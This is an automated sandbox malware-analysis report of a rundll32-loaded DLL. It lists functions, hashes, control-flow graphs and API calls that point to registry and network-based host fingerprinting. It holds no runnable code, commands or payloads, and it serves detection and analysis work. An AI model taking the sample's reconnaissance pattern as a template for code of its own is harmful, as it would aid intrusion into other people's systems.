    • Instruction ID: db4a84fa6982143c7c33dfe34c3a17843d863ef48f034b46a87b3d783bc23db7
    • Opcode Fuzzy Hash: 71db46e1dc4537d7a33d97d80a5c1f21eb868e22e8d370c5f460187df6bb74ed
    • Instruction Fuzzy Hash: 4561FE3691DE82C5EB50DB62F89436E73A9FB84764F000179EA8D86AB5DF3CE444CB41
    Function 00007FFE115019C0 Relevance: 6.0, APIs: 4, Instructions: 35libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: InfoSystem$AddressHandleModuleNativeProc
    • String ID:
    • API String ID: 3433367815-0
    • Opcode ID: e677bc09c55e719f3190c1f42bac40b38a2ab6fa020279fe3f27c748c2806ca4
    • Instruction ID: f06dbabcead49a6ffaa2a1a3f39f9ba9bd6acfd41af3442893245330c3ef6a14
    • Opcode Fuzzy Hash: e677bc09c55e719f3190c1f42bac40b38a2ab6fa020279fe3f27c748c2806ca4
    • Instruction Fuzzy Hash: A1119336519E4186E760DB11E49436EB7B8FB88764F501179F6CE82AB8DF3CD988CB40
    Function 00007FFE11506980 Relevance: 3.0, APIs: 2, Instructions: 9memorythreadCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: HeapLanguagesPreferredProcessRestoreThread
    • String ID:
    • API String ID: 1665715086-0
    • Opcode ID: 59fcb09733b26d148cb803ad4bcfdd23a7556180398aad1d468162f2fb759d25
    • Instruction ID: a428d5cf2f262633adb7a35786f650712776813ac4f8f25e199d73b0a9d0bf79
    • Opcode Fuzzy Hash: 59fcb09733b26d148cb803ad4bcfdd23a7556180398aad1d468162f2fb759d25
    • Instruction Fuzzy Hash: 6FC01260D15E4181D704BB67A84C055A7B6BFCC750F504078D98901234DD3C80958A00
    Function 00007FFE11503A70 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 242registrynetworkCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 96 7ffe11503a70-7ffe11503b01 call 7ffe1150d1c0 call 7ffe1150ceb4 WSAStartup 101 7ffe11503bad-7ffe11503bee call 7ffe11507d50 RegOpenKeyExW 96->101 102 7ffe11503b07-7ffe11503b1d gethostname 96->102 108 7ffe11503d1d-7ffe11503d45 call 7ffe11507e50 GlobalMemoryStatusEx 101->108 109 7ffe11503bf4-7ffe11503c0d call 7ffe11507d50 101->109 104 7ffe11503ba7 WSACleanup 102->104 105 7ffe11503b23-7ffe11503b3c gethostbyname 102->105 104->101 105->104 107 7ffe11503b3e-7ffe11503b65 105->107 107->104 113 7ffe11503b67-7ffe11503ba3 call 7ffe1150a460 inet_ntoa call 7ffe1150d1c0 107->113 118 7ffe11503d5d-7ffe11503d75 call 7ffe11506890 108->118 119 7ffe11503d47-7ffe11503d59 108->119 120 7ffe11503c19-7ffe11503c66 RegEnumKeyExW 109->120 113->104 131 7ffe11503d7b-7ffe11503d90 call 7ffe11506950 118->131 132 7ffe11503f3f-7ffe11503f5e call 7ffe11509540 118->132 119->118 123 7ffe11503c6c-7ffe11503c9a RegOpenKeyExW 120->123 124 7ffe11503d05-7ffe11503d17 call 7ffe11507e50 RegCloseKey 120->124 128 7ffe11503c9c-7ffe11503cd6 RegQueryValueExW 123->128 129 7ffe11503d00 123->129 124->108 134 7ffe11503cd8-7ffe11503cf0 128->134 135 7ffe11503cf2-7ffe11503cfa RegCloseKey 128->135 129->124 133 7ffe11503c0f-7ffe11503c15 129->133 140 7ffe11503d96-7ffe11503ed5 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d290 call 7ffe115011e0 call 7ffe11501d20 131->140 141 7ffe11503f35-7ffe11503f3a call 7ffe11506980 131->141 133->120 134->124 135->129 153 7ffe11503f1a-7ffe11503f33 140->153 154 7ffe11503ed7-7ffe11503f15 call 7ffe1150d290 call 7ffe11506f60 call 7ffe11506e50 140->154 141->132 153->141 154->153
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: CloseOpen$CleanupEnumGlobalMemoryQueryStartupStatusValuegethostbynamegethostnameinet_ntoawcscpy
    • String ID: ,$@
    • API String ID: 923405552-1227015840
    • Opcode ID: 65caa8c5a241ffd7d47acb45c6f88a9704745af025500333e1ec2035ba852a81
    • Instruction ID: d012f5035a357dbfae33fa2ba75c19fb6a55825fc95bf77ab042316a3663ac6c
    • Opcode Fuzzy Hash: 65caa8c5a241ffd7d47acb45c6f88a9704745af025500333e1ec2035ba852a81
    • Instruction Fuzzy Hash: 41D1077261CA8186E760DB56E4903AEB7A5FBC4794F104029EA8D83BB9DF7DD444CF40
    Function 00007FFE11503B48 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 204registrynetworkCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Open$CleanupCloseEnumGlobalMemoryQueryStatusValueinet_ntoa
    • String ID: ,$@
    • API String ID: 1891009110-1227015840
    • Opcode ID: 63b97c74359e0a057b7be61e168736e51b464f00bf6f615fd0d09763af04dbdc
    • Instruction ID: ba9be3b34e3b5683afda6cd982f910ac3e4f7520af80a386146bb3762019f87b
    • Opcode Fuzzy Hash: 63b97c74359e0a057b7be61e168736e51b464f00bf6f615fd0d09763af04dbdc
    • Instruction Fuzzy Hash: 0BB1F776608A818AD760DB5AE4903AEB7B5F7C9794F104029EB8D83BA9DF7DD404CF40
    Function 00007FFE11509800 Relevance: 16.6, APIs: 11, Instructions: 133COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 420 7ffe11509800-7ffe11509806 421 7ffe11509841-7ffe11509998 420->421 422 7ffe11509808-7ffe1150980b 420->422 429 7ffe1150999e-7ffe115099b9 call 7ffe11509bb0 421->429 430 7ffe1150999a-7ffe1150999c 421->430 424 7ffe11509835-7ffe1150986d call 7ffe11509d20 422->424 425 7ffe1150980d-7ffe11509810 422->425 438 7ffe11509872-7ffe11509874 424->438 427 7ffe11509812-7ffe11509815 425->427 428 7ffe11509828 __scrt_dllmain_crt_thread_attach 425->428 434 7ffe11509821-7ffe11509826 call 7ffe11509c60 427->434 435 7ffe11509817-7ffe11509820 427->435 436 7ffe1150982d-7ffe11509834 428->436 440 7ffe115099c5-7ffe115099ec call 7ffe11509cdc call 7ffe11509d0c call 7ffe11509ed4 call 7ffe11509ef8 429->440 441 7ffe115099bb-7ffe115099c0 call 7ffe1150a088 429->441 431 7ffe115099ee-7ffe115099fd 430->431 434->436 442 7ffe11509876-7ffe11509878 438->442 443 7ffe1150987d-7ffe11509892 call 7ffe11509bb0 438->443 440->431 441->440 447 7ffe11509965-7ffe1150997a 442->447 452 7ffe1150989e-7ffe115098af call 7ffe11509c20 443->452 453 7ffe11509894-7ffe11509899 call 7ffe1150a088 443->453 460 7ffe115098b1-7ffe115098ed call 7ffe1150a1d0 call 7ffe11509f74 call 7ffe1150a038 call 7ffe11509f74 call 7ffe1150a05c call 7ffe1150d3b0 452->460 461 7ffe11509918-7ffe11509922 call 7ffe11509ed4 452->461 453->452 460->461 488 7ffe115098ef-7ffe115098f6 __scrt_dllmain_after_initialize_c 460->488 461->442 469 7ffe11509928-7ffe11509934 call 7ffe1150a078 461->469 475 7ffe11509936-7ffe11509940 call 7ffe11509e38 469->475 476 7ffe1150995a-7ffe11509960 469->476 475->476 482 7ffe11509942-7ffe11509955 call 7ffe1150a268 475->482 476->447 482->476 488->461 489 7ffe115098f8-7ffe11509915 call 7ffe1150d338 488->489 489->461
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_release_startup_lock
    • String ID:
    • API String ID: 3876781719-0
    • Opcode ID: c6ae1502c2579020218e65238a4c269c22d830b64cbdee382b0e0d31bb45c9a4
    • Instruction ID: 1d34f49678ba88af66f3cdec63370f005039d64117f364af33fcc5720b4149d4
    • Opcode Fuzzy Hash: c6ae1502c2579020218e65238a4c269c22d830b64cbdee382b0e0d31bb45c9a4
    • Instruction Fuzzy Hash: 68517E21E0CE4385FB10ABE7A4522BD53A8AF553A0F9444BDE94D463FBEE2CE945C341
    Function 00007FFE11504890 Relevance: 12.2, APIs: 8, Instructions: 223registryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 492 7ffe11504890-7ffe1150493a call 7ffe11507d50 RegOpenKeyExW 495 7ffe11504d50-7ffe11504d79 call 7ffe11507e50 call 7ffe11509540 492->495 496 7ffe11504940-7ffe11504955 call 7ffe11506950 492->496 501 7ffe1150495b-7ffe11504a2b call 7ffe1150d1c0 call 7ffe11507d50 * 3 call 7ffe11507c50 * 2 RegEnumKeyExW 496->501 502 7ffe11504d42-7ffe11504d4a RegCloseKey 496->502 518 7ffe11504cf1-7ffe11504d3d call 7ffe1150d290 call 7ffe11507e50 * 5 501->518 519 7ffe11504a31-7ffe11504a5c RegOpenKeyExW 501->519 502->495 518->502 521 7ffe11504cec 519->521 522 7ffe11504a62-7ffe11504a9c RegQueryValueExW 519->522 524 7ffe11504aa2-7ffe11504ad2 call 7ffe11506890 522->524 525 7ffe11504ce1-7ffe11504ce6 RegCloseKey 522->525 531 7ffe11504ad4-7ffe11504ade 524->531 532 7ffe11504b31-7ffe11504b6b RegQueryValueExW 524->532 525->521 536 7ffe11504af6-7ffe11504b2c call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 531->536 537 7ffe11504ae0-7ffe11504ae5 531->537 533 7ffe11504b6d-7ffe11504b9d call 7ffe11506890 532->533 534 7ffe11504beb-7ffe11504bff call 7ffe1150d120 532->534 548 7ffe11504be9 533->548 549 7ffe11504b9f-7ffe11504be4 call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 533->549 551 7ffe11504c09-7ffe11504c43 RegQueryValueExW 534->551 552 7ffe11504c04 call 7ffe1150d120 534->552 536->532 537->536 540 7ffe11504ae7-7ffe11504af1 call 7ffe1150d120 537->540 540->536 548->551 549->548 554 7ffe11504c45-7ffe11504c75 call 7ffe11506890 551->554 555 7ffe11504cc3-7ffe11504cd7 call 7ffe1150d120 551->555 552->551 569 7ffe11504c77-7ffe11504cbc call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 554->569 570 7ffe11504cc1 554->570 555->525 572 7ffe11504cdc call 7ffe1150d120 555->572 569->570 570->525 572->525
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: QueryValue$ByteCharCloseHeapMultiOpenWide$AllocateEnumProcess
    • String ID:
    • API String ID: 115269039-0
    • Opcode ID: ec38c8757f2f3573cc8d4f1ab0689ad033bc330676511e593263a61f6042648a
    • Instruction ID: 036e0120f42b5caac4813346abc98ef193c9b2ac5027bdf6822700b69918eb2f
    • Opcode Fuzzy Hash: ec38c8757f2f3573cc8d4f1ab0689ad033bc330676511e593263a61f6042648a
    • Instruction Fuzzy Hash: 3DD1C53260CE8181E720DB66E4903AFA7A9FBC57A4F500179EA8D47AB9DF7DD444CB40
    Function 00007FFE11509260 Relevance: 10.6, APIs: 7, Instructions: 81libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092B5
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092F3
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150932A
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE11509368
    • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150937F
    • CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150938D
    • LocalFree.KERNEL32 ref: 00007FFE115093F2
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressCommandLibraryLineLoadProc$ArgvFreeLocal
    • String ID:
    • API String ID: 1914251671-0
    • Opcode ID: 05b860a98461b70195d5c2b97518a6ca621709cc4def6e7b24c632f463f08a3e
    • Instruction ID: e48b50eec5357af9a703a07c7079bfa9f97defd198ccc0c20c8938f69252fb8d
    • Opcode Fuzzy Hash: 05b860a98461b70195d5c2b97518a6ca621709cc4def6e7b24c632f463f08a3e
    • Instruction Fuzzy Hash: 8A41E13291CE46C5E750DB52E89436D73B8FB84764F101179E98D466B9DF7CE884CB01
    Function 00007FFE115049D4 Relevance: 9.1, APIs: 6, Instructions: 140registryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 743 7ffe115049d4-7ffe115049da 744 7ffe115049de-7ffe11504a2b RegEnumKeyExW 743->744 745 7ffe11504cf1-7ffe11504d79 call 7ffe1150d290 call 7ffe11507e50 * 5 RegCloseKey call 7ffe11507e50 call 7ffe11509540 744->745 746 7ffe11504a31-7ffe11504a5c RegOpenKeyExW 744->746 748 7ffe11504cec 746->748 749 7ffe11504a62-7ffe11504a9c RegQueryValueExW 746->749 751 7ffe11504aa2-7ffe11504ad2 call 7ffe11506890 749->751 752 7ffe11504ce1-7ffe11504ce6 RegCloseKey 749->752 758 7ffe11504ad4-7ffe11504ade 751->758 759 7ffe11504b31-7ffe11504b6b RegQueryValueExW 751->759 752->748 763 7ffe11504af6-7ffe11504b2c call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 758->763 764 7ffe11504ae0-7ffe11504ae5 758->764 760 7ffe11504b6d-7ffe11504b9d call 7ffe11506890 759->760 761 7ffe11504beb-7ffe11504bff call 7ffe1150d120 759->761 775 7ffe11504be9 760->775 776 7ffe11504b9f-7ffe11504be4 call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 760->776 778 7ffe11504c09-7ffe11504c43 RegQueryValueExW 761->778 779 7ffe11504c04 call 7ffe1150d120 761->779 763->759 764->763 767 7ffe11504ae7-7ffe11504af1 call 7ffe1150d120 764->767 767->763 775->778 776->775 781 7ffe11504c45-7ffe11504c75 call 7ffe11506890 778->781 782 7ffe11504cc3-7ffe11504cd7 call 7ffe1150d120 778->782 779->778 797 7ffe11504c77-7ffe11504cbc call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 781->797 798 7ffe11504cc1 781->798 782->752 801 7ffe11504cdc call 7ffe1150d120 782->801 797->798 798->752 801->752
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: QueryValue$ByteCharCloseMultiWide$EnumOpen
    • String ID:
    • API String ID: 1690686292-0
    • Opcode ID: a0e63b19bc7910238b358a06483358d207d4f0b4b68c84cd2e029b785d97e623
    • Instruction ID: b21608b6ebc04d76040bbed922edeb6cf8bd14e9ba285dcd09895736a379e2b5
    • Opcode Fuzzy Hash: a0e63b19bc7910238b358a06483358d207d4f0b4b68c84cd2e029b785d97e623
    • Instruction Fuzzy Hash: 8C71F63260CA8182E720DB96E4807AFB7A8FBC5794F100179EA8D43A79DFBDD544CB40
    Function 00007FFE11501B70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressGlobalHandleMemoryModuleProcStatus
    • String ID: @
    • API String ID: 2450578220-2766056989
    • Opcode ID: 5a9844992750ecd458e2b383ff26373545e98ae454aa3d0bdf05184a909415dd
    • Instruction ID: 6e895802555e263cb2a6838d5720bccaf757e83a806f04f3f9a29b6184a65c31
    • Opcode Fuzzy Hash: 5a9844992750ecd458e2b383ff26373545e98ae454aa3d0bdf05184a909415dd
    • Instruction Fuzzy Hash: 4311FE32618E8186E760DB62F85536EB7A4FBC8754F400179FACD42679DF7CD4448B00
    Function 00007FFE11505000 Relevance: 6.0, APIs: 4, Instructions: 43synchronizationCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • SetLastError.KERNEL32 ref: 00007FFE1150503A
    • CreateMutexW.KERNELBASE ref: 00007FFE11505049
    • GetLastError.KERNEL32 ref: 00007FFE1150505C
    • CloseHandle.KERNEL32 ref: 00007FFE115050B7
      • Part of subcall function 00007FFE11509260: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092B5
      • Part of subcall function 00007FFE11509260: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092F3
      • Part of subcall function 00007FFE11509260: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150932A
      • Part of subcall function 00007FFE11509260: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE11509368
      • Part of subcall function 00007FFE11509260: GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150937F
      • Part of subcall function 00007FFE11509260: CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150938D
      • Part of subcall function 00007FFE11509260: LocalFree.KERNEL32 ref: 00007FFE115093F2
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressCommandErrorLastLibraryLineLoadProc$ArgvCloseCreateFreeHandleLocalMutex
    • String ID:
    • API String ID: 1743422195-0
    • Opcode ID: 583719332c49e15a3f9299204943d45c8ddca9c3a94468d76afc3e38b5f171f5
    • Instruction ID: e0ee7b3fca2dd34c81964f06cc7a24f0e70bbd962bce8e0556447650e419066d
    • Opcode Fuzzy Hash: 583719332c49e15a3f9299204943d45c8ddca9c3a94468d76afc3e38b5f171f5
    • Instruction Fuzzy Hash: 3411FE3292CE4282E720EB62E45437E6379FB847A8F4005B9E98E42675DF3CD5448B41
    Function 00007FFE11509A00 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: dllmain_raw
    • String ID:
    • API String ID: 3813456430-0
    • Opcode ID: e3c5f061e975df4a223fc143aaab9d369895142f65f0d891aebea7ace007555a
    • Instruction ID: 623281d67ac815f7a3d39c2ad1c4e0c9e525b4900c27dd2adbc5fabb58146eb3
    • Opcode Fuzzy Hash: e3c5f061e975df4a223fc143aaab9d369895142f65f0d891aebea7ace007555a
    • Instruction Fuzzy Hash: 81318D21F0CE4242FB5096AB448017E65E95FC5BE0B1840BCED0D837BAFFBCE9428244
    Function 00007FFE11501A80 Relevance: 4.5, APIs: 3, Instructions: 42libraryloaderCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressLibraryLoadPathProcTemp
    • String ID:
    • API String ID: 1686214323-0
    • Opcode ID: adb6b4d00b339c251d18baf7af4e288d6304fd83c2c02fd41bcd5d8de635a0e1
    • Instruction ID: 495d9e6f2be3ed3b76d4e0d096fd5b6dddd8727e88f27c3485e00ccc910244dd
    • Opcode Fuzzy Hash: adb6b4d00b339c251d18baf7af4e288d6304fd83c2c02fd41bcd5d8de635a0e1
    • Instruction Fuzzy Hash: B9213B3691DE81C5E760DB62E89437A73B8FB84764F4001B9EA8D466B4DF3CE444CB01
    Function 00007FFE1150FA20 Relevance: 3.8, APIs: 3, Instructions: 46COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,00007FFE1150F235,?,?,?,?,00007FFE1150E5BF,?,?,00000000,00007FFE1150F9C5,?,?,?), ref: 00007FFE1150FA2F
    • SetLastError.KERNEL32(?,?,?,00007FFE1150F235,?,?,?,?,00007FFE1150E5BF,?,?,00000000,00007FFE1150F9C5,?,?,?), ref: 00007FFE1150FA99
